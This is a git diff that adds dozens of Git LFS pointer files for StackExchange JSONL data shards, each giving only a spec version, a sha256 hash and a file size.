a/data/stackexchange/1-1/2025_2289.jsonl b/data/stackexchange/1-1/2025_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fec36d2becc17143e780306f256ce073f7088886 --- /dev/null +++ b/data/stackexchange/1-1/2025_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8eb5b27c8775c0a7176237bc2d4674dcca7abc712b5fe95f400e034af03d54d6 +size 41534599 diff --git a/data/stackexchange/1-1/2026_2289.jsonl b/data/stackexchange/1-1/2026_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba51bf49c0be1e54718293a258766e56b03b8d3b --- /dev/null +++ b/data/stackexchange/1-1/2026_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:261039376f59a4fa2ebfbabd45885312c055c09517b4fd6a4390d20d04b6e474 +size 39763074 diff --git a/data/stackexchange/1-1/2027_2289.jsonl b/data/stackexchange/1-1/2027_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..905e1488cfec93d778c2fae79b16eecb8c9bc131 --- /dev/null +++ b/data/stackexchange/1-1/2027_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f469f0b0f8d7220ed642b3e9b98290e7ee8df6b025d17a0164f40402591daf6b +size 40684238 diff --git a/data/stackexchange/1-1/2028_2289.jsonl b/data/stackexchange/1-1/2028_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dde56003ea14a0d9e60acb0418ea6e6a2fffd52 --- /dev/null +++ b/data/stackexchange/1-1/2028_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32c42ea84ed199e00ce86a0de18b9ee81e946ac37483b201e049262844b4d88c +size 39861929 diff --git a/data/stackexchange/1-1/2029_2289.jsonl b/data/stackexchange/1-1/2029_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c90d05429ba5a0f9a365ae83f8416a2a78dce192 --- /dev/null +++ b/data/stackexchange/1-1/2029_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51035e7aa670fb1d6fbde8370bbad430b7d166f986544e7116ea5b7f463deec4 +size 40842008 diff --git a/data/stackexchange/1-1/202_2289.jsonl b/data/stackexchange/1-1/202_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..01de695a9392d1abcc91d20e525a3c9e97771453 --- /dev/null +++ b/data/stackexchange/1-1/202_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a983234a7a3512ac4df6a1665b7f99354c02cef9f98ec594c6e96bc40a6f17a0 +size 38374222 diff --git a/data/stackexchange/1-1/2030_2289.jsonl b/data/stackexchange/1-1/2030_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e25dfeec0de3072c76a35cfa2de5f16e7bfef1c5 --- /dev/null +++ b/data/stackexchange/1-1/2030_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:678668bef482a0a5d37fee52a0e303aa2778516c5f5194f90b2c18be30d5ce06 +size 39425646 diff --git a/data/stackexchange/1-1/2031_2289.jsonl b/data/stackexchange/1-1/2031_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37954af3e3b59f152b36b801d66d02c5b6f8ac76 --- /dev/null +++ b/data/stackexchange/1-1/2031_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1347d0e5cf1578569ecce74abf7d0d6c2fce77bbf38fe25852342a973628c302 +size 40583815 diff --git a/data/stackexchange/1-1/2032_2289.jsonl b/data/stackexchange/1-1/2032_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59f82462e1358539b7a8faa26a444c58615f285d --- /dev/null +++ b/data/stackexchange/1-1/2032_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:229a04e5a238abf493e19533de7eda005b95ef987b2f2a59d6e2298115f639e1 +size 39762106 diff --git a/data/stackexchange/1-1/2033_2289.jsonl b/data/stackexchange/1-1/2033_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c47e664490bfd5d17c8a1fd412135cd8b305826 --- /dev/null +++ b/data/stackexchange/1-1/2033_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eac42f74c7046c8c095c41a76d53b6d2cdb18a20e965f04c5f7ee7e225d42cc9 +size 39193360 diff --git a/data/stackexchange/1-1/2034_2289.jsonl b/data/stackexchange/1-1/2034_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11455607ef3a368eade9a675c4b2f97dcf4752f1 --- /dev/null +++ b/data/stackexchange/1-1/2034_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dbd5b77dce1bf21a214ed5a4fb3928dee8bf618c98e26027679f1243706c01a2 +size 39492435 diff --git a/data/stackexchange/1-1/2035_2289.jsonl b/data/stackexchange/1-1/2035_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26c844c253d4e8812517963cd49d8d1c143d7311 --- /dev/null +++ b/data/stackexchange/1-1/2035_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f3a82dcf44d15a2dac1f67087e0a0bf7f67fd910524b8b493775cc740ff384f +size 39732033 diff --git a/data/stackexchange/1-1/2036_2289.jsonl b/data/stackexchange/1-1/2036_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f28f3b2bf2c2d64ee3081e6f93b6686a51106997 --- /dev/null +++ b/data/stackexchange/1-1/2036_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fb32bd919b7e1163e01c4f769d7cba2150c917e01ebc5f3fb86485e37279dec +size 40172353 diff --git a/data/stackexchange/1-1/2037_2289.jsonl b/data/stackexchange/1-1/2037_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..809fbe87b347614ff756c85244ff948c0224bb94 --- /dev/null +++ b/data/stackexchange/1-1/2037_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41b8ae0b843c25701a342626488724c51a546fc1ef3bfceb306853d576f578fd +size 41343182 diff --git a/data/stackexchange/1-1/2038_2289.jsonl b/data/stackexchange/1-1/2038_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12ad51f648fd48d7503f6a4125cbd1bb5e1c2201 --- /dev/null +++ b/data/stackexchange/1-1/2038_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0856476498f2b461f23b93517a1d419b55ad948488c419c1956ff2f3e4aa788a +size 40055455 diff --git a/data/stackexchange/1-1/2039_2289.jsonl b/data/stackexchange/1-1/2039_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a41f6edd35fdd1ab64cac7b3982dc8bc5d36dc9 --- /dev/null +++ b/data/stackexchange/1-1/2039_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80119139aef921af75aa261eaeed13b8fbef991056fc2862defd13ce37d299d8 +size 39007033 diff --git a/data/stackexchange/1-1/203_2289.jsonl b/data/stackexchange/1-1/203_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05ced0abb6c6566820df77cb1008af915932f979 --- /dev/null +++ b/data/stackexchange/1-1/203_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42c6eac85ff752ce44085065b784e7d49b343f64f5b0b1667c69e2dab18ae011 +size 37156435 diff --git a/data/stackexchange/1-1/2040_2289.jsonl b/data/stackexchange/1-1/2040_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dff34861e5cfdef5c52a4e17c4a9b9233dc646ea --- /dev/null +++ b/data/stackexchange/1-1/2040_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d95a5eeaabcc7629957be1bd8e4a9808dcf098704a65ff087fcb70095f7a214f +size 39893795 diff --git a/data/stackexchange/1-1/2041_2289.jsonl b/data/stackexchange/1-1/2041_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a92022820bc0f5b2fd58942b8d7833a4e7cbd4c --- /dev/null +++ b/data/stackexchange/1-1/2041_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9ceff97c58d1fad9fc764df0c999f4d50d71a0cdc278bd073730f88a8413a9c +size 39114761 diff --git a/data/stackexchange/1-1/2042_2289.jsonl b/data/stackexchange/1-1/2042_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6753b196958f6959bc24d91369036b630ed54f1 --- /dev/null +++ b/data/stackexchange/1-1/2042_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee21d900a453d64ec22311c481ba647b392b07c6df06e9c111022c416a6b4de8 +size 39235242 diff --git a/data/stackexchange/1-1/2043_2289.jsonl b/data/stackexchange/1-1/2043_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af300fbf20e383601eadd64ba26b53051c8c7cde --- /dev/null +++ b/data/stackexchange/1-1/2043_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb670b47ced96d0903bb805c4cf3d7a2f40c65f3d88e6b5c5181f947f19790ed +size 39519623 diff --git a/data/stackexchange/1-1/2044_2289.jsonl b/data/stackexchange/1-1/2044_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c9502590df82338787b6475c684b97fffe98d6f --- /dev/null +++ b/data/stackexchange/1-1/2044_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82d28b701f6909129975d7927d251efcac341f35ffcfe5f19b08a9e2f1fcb361 +size 38810232 diff --git a/data/stackexchange/1-1/2045_2289.jsonl b/data/stackexchange/1-1/2045_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f1a773d5704418d63452795bdbe1460bafd8852 --- /dev/null +++ b/data/stackexchange/1-1/2045_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf67beda7c701fe49cb4e2926bf2b2c97006d440c11cdc8d00d2f732897f7b72 +size 39888754 diff --git a/data/stackexchange/1-1/2046_2289.jsonl b/data/stackexchange/1-1/2046_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..824cf80c06121b052a68c7bb38a213270c9f1e24 --- /dev/null +++ b/data/stackexchange/1-1/2046_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31b0e746fc9cda330d9fc5405fca7639dc85832f7139fa67776e6cfe8f3b2dcb +size 38740484 diff --git a/data/stackexchange/1-1/2047_2289.jsonl b/data/stackexchange/1-1/2047_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c89a6a03a5750c60c96fb4dda11c2f49ab5f93d6 --- /dev/null +++ b/data/stackexchange/1-1/2047_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e3098a48d9e22dcda0563df1035c63c0a9004329411ed679f3aaa5083a0c929 +size 38722288 diff --git a/data/stackexchange/1-1/2048_2289.jsonl b/data/stackexchange/1-1/2048_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..772f8441275cea49834c62e4388ac9129fe20ed4 --- /dev/null +++ b/data/stackexchange/1-1/2048_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5bbd0c1982bc734dc587bea1f09728387facb1f4413508990459403739e42371 +size 38871674 diff --git a/data/stackexchange/1-1/2049_2289.jsonl b/data/stackexchange/1-1/2049_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab760fb59e2dad8a2d9051813a514012c76243a5 --- /dev/null +++ b/data/stackexchange/1-1/2049_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfd560b18e68be8b88caa35ceba208d0f3cf9930eb4df8458d6e1569d90f4a6b +size 38705944 diff --git a/data/stackexchange/1-1/204_2289.jsonl b/data/stackexchange/1-1/204_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c13548ef80b073a032b9c53e1746cb8c41b5b3c2 --- /dev/null +++ b/data/stackexchange/1-1/204_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d74a248cc329eec2649e6bb3c50d958a9280957c3485055299bbcd7b7d1cfab +size 37938146 diff --git a/data/stackexchange/1-1/2050_2289.jsonl b/data/stackexchange/1-1/2050_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec0d95be417965fd49d045a22ae9d355fcb7aa28 --- /dev/null +++ b/data/stackexchange/1-1/2050_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8d4106adbcb563806b5c2db9508bf373d3ce55346cf3967d2898d13803cdf2e +size 38940949 diff --git a/data/stackexchange/1-1/2051_2289.jsonl b/data/stackexchange/1-1/2051_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fab369c98bb0b86a15b22af37eaac63c18ce4c7 --- /dev/null +++ b/data/stackexchange/1-1/2051_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bb072b0b31cbf239886df28fabaab2221e9ab5ec5d7ba78fafcd3079b51ecf8 +size 38994116 diff --git a/data/stackexchange/1-1/2052_2289.jsonl b/data/stackexchange/1-1/2052_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..432f90213f06ec49b60477769ebd06bdc55c537e --- /dev/null +++ b/data/stackexchange/1-1/2052_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0d5ad29841fbe35c5c35214ab9909705c7300f2ffd0b3baaabd3c4a13aaea47b +size 39174012 diff --git a/data/stackexchange/1-1/2053_2289.jsonl b/data/stackexchange/1-1/2053_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..658703d881f6b1405ac89f101214e91bcaf4cd76 --- /dev/null +++ b/data/stackexchange/1-1/2053_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdef2ce54022630bfabc54c1f39839d1a5f4bebb4ea988165bd550d8193842aa +size 39031404 diff --git a/data/stackexchange/1-1/2054_2289.jsonl b/data/stackexchange/1-1/2054_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..55c68cefc9613ee352e32095cd45c5d56230e5a7 --- /dev/null +++ b/data/stackexchange/1-1/2054_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81cc9db832dede293a59f9bf7c78c583fff25647499e0eadd22c69135e598b97 +size 38761067 diff --git a/data/stackexchange/1-1/2055_2289.jsonl b/data/stackexchange/1-1/2055_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0349625032831c7b8e8fee29529177447b459a6 --- /dev/null +++ b/data/stackexchange/1-1/2055_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2bcc1f4459d8a2bebe095f5bc4a74ac45c649547510d51defcfb96472e1929d3 +size 38886667 diff --git a/data/stackexchange/1-1/2056_2289.jsonl b/data/stackexchange/1-1/2056_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cde9f8f85eb1ae7bba8690fa3d0bbf99bc7c70db --- /dev/null +++ b/data/stackexchange/1-1/2056_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ec1748e3fc62842aaeee6f19857eadfe52c22510dbe78d281b4ef70e7f9053b +size 39615570 diff --git a/data/stackexchange/1-1/2057_2289.jsonl b/data/stackexchange/1-1/2057_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae6c3265cc77f21c8db5f40d3c24e6506811a72d --- /dev/null +++ b/data/stackexchange/1-1/2057_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc644a12de0a0b471d75df68c1a20c17101c6bbcd5e083cb035dd8a79d91f167 +size 38923838 diff --git a/data/stackexchange/1-1/2058_2289.jsonl b/data/stackexchange/1-1/2058_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..001c870988dedebc8da03151788d9f5d287e0f53 --- /dev/null +++ b/data/stackexchange/1-1/2058_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:faf1ca0a647b131ea37efc8df8df0d04b027f370b992369af5cbd861d61bb718 +size 40038985 diff --git a/data/stackexchange/1-1/2059_2289.jsonl b/data/stackexchange/1-1/2059_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36a8c0fe757870431c7180d50b78059d956f4a2c --- /dev/null +++ b/data/stackexchange/1-1/2059_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:686196d9a8124baa6825ea9b880d30ce56b2c2d5ddce4704fc29dbd47180db05 +size 39994879 diff --git a/data/stackexchange/1-1/205_2289.jsonl b/data/stackexchange/1-1/205_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8b2ea547655080c95a2b7a6ef2d327d0fa8599b --- /dev/null +++ b/data/stackexchange/1-1/205_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:866e48cf8c5753d3bd193bd0aae786cd4bcd709735a07a6369bf5840747cffd1 +size 38437801 diff --git a/data/stackexchange/1-1/2060_2289.jsonl b/data/stackexchange/1-1/2060_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58f47806a76d24b8c8e92f35d1d1d7eee0ad9eb1 --- /dev/null +++ b/data/stackexchange/1-1/2060_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a0cf9fd27738754401e0bbcbbd40ce92e521a822394ee20676b297d71d5f27a +size 39228918 diff --git a/data/stackexchange/1-1/2061_2289.jsonl b/data/stackexchange/1-1/2061_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37df1891e5134bdb9c773f8cc74edb4fbdfc0021 --- /dev/null +++ b/data/stackexchange/1-1/2061_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:970f76885e4a34bd3ebbebc59e9ad5a6610f44f0ac863de7c9a27dd2ce47e135 +size 38992269 diff --git a/data/stackexchange/1-1/2062_2289.jsonl b/data/stackexchange/1-1/2062_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59639ff1edc17a79a227d0faf70474fa06e15105 --- /dev/null +++ b/data/stackexchange/1-1/2062_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:912a8d843a659ab245964452ef9ed45f2a56bf3db84b6dbb521859d88615748a +size 39250747 diff --git a/data/stackexchange/1-1/2063_2289.jsonl b/data/stackexchange/1-1/2063_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f365d6d6213db433d7ea78a09b46406c47929f4c --- /dev/null +++ b/data/stackexchange/1-1/2063_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bd07edb110167f09429a06cfb31c1c86eb4054422b9acc095f531284c757d62 +size 38751543 diff --git a/data/stackexchange/1-1/2064_2289.jsonl b/data/stackexchange/1-1/2064_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..708083c82949658a3be14fa93c0b4fae1cff2ea4 --- /dev/null +++ b/data/stackexchange/1-1/2064_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ab74fbc7464e1e2e0ee2d5491ec17f8d4ba87546f5d61ee3346e0202ba6ab59 +size 39981901 diff --git a/data/stackexchange/1-1/2065_2289.jsonl b/data/stackexchange/1-1/2065_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1b115bfa2ee1ef42eaa90ec084f020be6b9e90c1 --- /dev/null +++ b/data/stackexchange/1-1/2065_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fde7584820c456dea146cbf28d02e3c5aaa5bea966888baf45c22455ead192e6 +size 39624623 diff --git a/data/stackexchange/1-1/2066_2289.jsonl b/data/stackexchange/1-1/2066_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28b9dfebd50517f8e6442f33535d82fcabf8f01c --- /dev/null +++ b/data/stackexchange/1-1/2066_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:053453785870d99ca54bad46adf1deebdc35bf79e30175dac60d47f5b82bc27e +size 39142612 diff --git a/data/stackexchange/1-1/2067_2289.jsonl b/data/stackexchange/1-1/2067_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc6b310abad3f20691a4e2983966cb1cbb36d798 --- /dev/null +++ b/data/stackexchange/1-1/2067_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9e98680e20fddfa2b3f27b158a7985d078da7080c580e73c2c7774f87dc0d05 +size 39145624 diff --git a/data/stackexchange/1-1/2068_2289.jsonl b/data/stackexchange/1-1/2068_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2879e8adecfc16e610e9723f924bd6affd64ed01 --- /dev/null +++ b/data/stackexchange/1-1/2068_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2aa97a63bda8819075babf3d4fd99189c0bcf38c8b1ffac1d73a7c3b229b3b49 +size 39224122 diff --git a/data/stackexchange/1-1/2069_2289.jsonl b/data/stackexchange/1-1/2069_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0df214442c29769ee1dab47e6d2c115ee91f0f39 --- /dev/null +++ b/data/stackexchange/1-1/2069_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51f7118125b73d89d9b13c93d456043f1c027a69539bebd873b94a9afb7730ec +size 39364206 diff --git a/data/stackexchange/1-1/206_2289.jsonl b/data/stackexchange/1-1/206_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0624595b44ac950cb190a8947c574b74b3aea68 --- /dev/null +++ b/data/stackexchange/1-1/206_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec156ae6e7873e106f9ebb3951d27aecf0048b053aba88ac5ef317da510065ed +size 37893870 diff --git a/data/stackexchange/1-1/2070_2289.jsonl b/data/stackexchange/1-1/2070_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2a1905bd8895d4e974423dbc09c656f27b9a22b --- /dev/null +++ b/data/stackexchange/1-1/2070_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bcd8e46784add5706efdaf048523ce6c5d34006006477f1947cfe7e596657913 +size 38795338 diff --git a/data/stackexchange/1-1/2071_2289.jsonl b/data/stackexchange/1-1/2071_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca228f895e46bc32d0f3cf969bf1d7e599dffd67 --- /dev/null +++ b/data/stackexchange/1-1/2071_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d1952321e58d4ea157f68898a342e718b6ffb958540d015ef59f7c8065a0c7c +size 39723761 diff --git a/data/stackexchange/1-1/2072_2289.jsonl b/data/stackexchange/1-1/2072_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dfbd3b9a3eb963a3121091bc29a02bce30101e3b --- /dev/null +++ b/data/stackexchange/1-1/2072_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:987bdea4ee20a22384ea72a1f10fdb5b3a10ae58fc52fcbd3d590e57154a5a38 +size 39390656 diff --git a/data/stackexchange/1-1/2073_2289.jsonl b/data/stackexchange/1-1/2073_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6dff17a480b61a6df8c7b07ceab04f0b3f6fef86 --- /dev/null +++ b/data/stackexchange/1-1/2073_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff867d18af82fea4094bfed8383cd77abc32f093e9542da6c4b33fa8f78e3a06 +size 38866050 diff --git a/data/stackexchange/1-1/2074_2289.jsonl b/data/stackexchange/1-1/2074_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f02941c8a4317f7cc5ff18b53317c827f39a6234 --- /dev/null +++ b/data/stackexchange/1-1/2074_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e40c5cd0302bc85476211ea7322ec9ca08fed65030ed6e92e632ef2993b6308f +size 39318501 diff --git a/data/stackexchange/1-1/2075_2289.jsonl b/data/stackexchange/1-1/2075_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..732e2e56eb9927c841c85b5f50f8c1733c6adbee --- /dev/null +++ b/data/stackexchange/1-1/2075_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c40dd895be4f223807adc12e14fb23242797c4f95a3fce4a8b85f2fd1b7c0586 +size 38743805 diff --git a/data/stackexchange/1-1/2076_2289.jsonl b/data/stackexchange/1-1/2076_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a16a68f198c37acca69274944a74258eceb3b7b3 --- /dev/null +++ b/data/stackexchange/1-1/2076_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b79d06b55c20fd79ea44981c34beb2916b8a0ab4fddd6d3226dd2e2ea1ee271 +size 38935237 diff --git a/data/stackexchange/1-1/2077_2289.jsonl b/data/stackexchange/1-1/2077_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d396d5ddfd5c35397f7b15e03aaf6e4f3ec44d96 --- /dev/null +++ b/data/stackexchange/1-1/2077_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cca3c2fc336cd3af1a5677e2c778a440279a9898a154ec485d927fd31d460fbe +size 39300458 diff --git a/data/stackexchange/1-1/2078_2289.jsonl b/data/stackexchange/1-1/2078_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9bcf362b9181649a5ba1311698352dbec900bf80 --- /dev/null +++ b/data/stackexchange/1-1/2078_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9422c7a558c13af3a042c28ae4f18d43920ae049c1594d5a2e07bf3255cd180 +size 39513482 diff --git a/data/stackexchange/1-1/2079_2289.jsonl b/data/stackexchange/1-1/2079_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2279ae9ea8ee07204a442dd651dc021236f67480 --- /dev/null +++ b/data/stackexchange/1-1/2079_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:215823a4a8a4616af96d8e6b5e145634ce772100055b679d128a06646d3bd088 +size 39437381 diff --git a/data/stackexchange/1-1/207_2289.jsonl b/data/stackexchange/1-1/207_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88b51db1289f40f6bf42e525dd8c4cbf81e7c384 --- /dev/null +++ b/data/stackexchange/1-1/207_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ec8a3f85a0290701adbc397bb6705bcccea1eeb262acb52dfa9d2cfd8e24d32 +size 37578969 diff --git a/data/stackexchange/1-1/2080_2289.jsonl b/data/stackexchange/1-1/2080_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb883a0884ebbc33aa6ff880f97c3537ee772744 --- /dev/null +++ b/data/stackexchange/1-1/2080_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df4cc428e65c716d5dcdf0b06b8f2f8def6f8941df4ab8fd8c4d3df949437529 +size 39213886 diff --git a/data/stackexchange/1-1/2081_2289.jsonl b/data/stackexchange/1-1/2081_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f656ed0f0f4bff17d772bcc6c6fd898d117e988 --- /dev/null +++ b/data/stackexchange/1-1/2081_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:78b6f3ae2c66cc3810825ce853ae58748dfb51ec10d59f16058b5c97a8cdc7b5 +size 38933053 diff --git a/data/stackexchange/1-1/2082_2289.jsonl b/data/stackexchange/1-1/2082_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec9c8797c14e1cc7f1c4dfe74bbff91184022c2a --- /dev/null +++ b/data/stackexchange/1-1/2082_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e422ca707586788b933fc1ce33e16c2ceadafafd41d63218b6c928af319158ff +size 39128936 diff --git a/data/stackexchange/1-1/2083_2289.jsonl b/data/stackexchange/1-1/2083_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bd1397282dae5ace645f8f1fe34e5de6a8456d4 --- /dev/null +++ b/data/stackexchange/1-1/2083_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1894ae1b164843e0de5ae421e273d4fffde76180512a07b9195c22a06f83e166 +size 39739985 diff --git 